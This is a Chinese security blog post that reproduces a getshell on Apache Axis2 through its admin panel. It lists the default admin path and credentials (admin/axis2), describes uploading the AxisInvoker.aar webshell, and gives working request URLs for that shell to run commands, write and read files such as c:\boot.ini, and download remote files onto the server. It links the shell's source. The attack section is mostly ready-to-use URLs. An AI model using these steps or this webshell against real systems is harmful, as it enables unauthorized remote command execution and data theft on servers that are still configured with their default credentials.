Adminxe's Blog | 低调求发展 - 潜心习安全 ,技术永无止境 | 谢谢您对本站的支持,有什么问题或者建议请及时联系:点击这里给我发消息

Apache Axis2 后台文件上传getshell 漏洞复现

渗透测试 Adminxe 6100℃ 0评论

0x00 前言

Apache Axis2是一个Web服务的核心支援引擎。AXIS2对旧有的AXIS重新设计及重写,并提供两种语言JavaC的开发版本。

事实上AXIS2 不只为WEB应用程序提供Web服务的界面,而且它也可以作为一个单独的服务器看待,而且很简单就能跟Apache Tomcat整合,目前AXIS2的最新版本是1.6.2。

Axis是一个开源、基于XML的Web服务架构。最开始由IBM公司研发,叫IBM-SOAP。后来由Apache基金会在SOAP的基础上推出了AXIS。AXIS本质是一个Java语言编写的SOAP引擎。利用它我们可以在各种分布式应用中,让各个应用能够彼此操作、交互。

0x01 漏洞复现

默认端口:8089

默认后台路径:/axis2-admin/login

默认账号密码:admin/axis2

选择Tools-“ Upload Service ”上传aar包 进行 getshell

成功后会提示“ File AxisInvoker.aar successfully uploaded  ”

http://xxx.xxx.xxx.xxx/axis2/services/Cat/exec?cmd=ipconfig

0x02 使用方法

马子的使用方法:

支持的命令:
exec-运行命令,在Linux / Windows上均可使用,不用担心。
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/exec?cmd=whoami
 
写-写文件
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/write?path=c:\1.1txt&content=123
 
info-显示某些信息,根据需要进行修改
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/info
 
读取-读取文件内容
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/read?path=c:\boot.ini
 
下载-下载文件并将其保存在某处
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/download?url=http://www.baidu.com&file=c:\122.txt

下载地址:https://github.com/CaledoniaProject/AxisInvoker

转载请注明:Adminxe's Blog » Apache Axis2 后台文件上传getshell 漏洞复现

喜欢 (27)or分享 (0)
发表我的评论
取消评论
表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址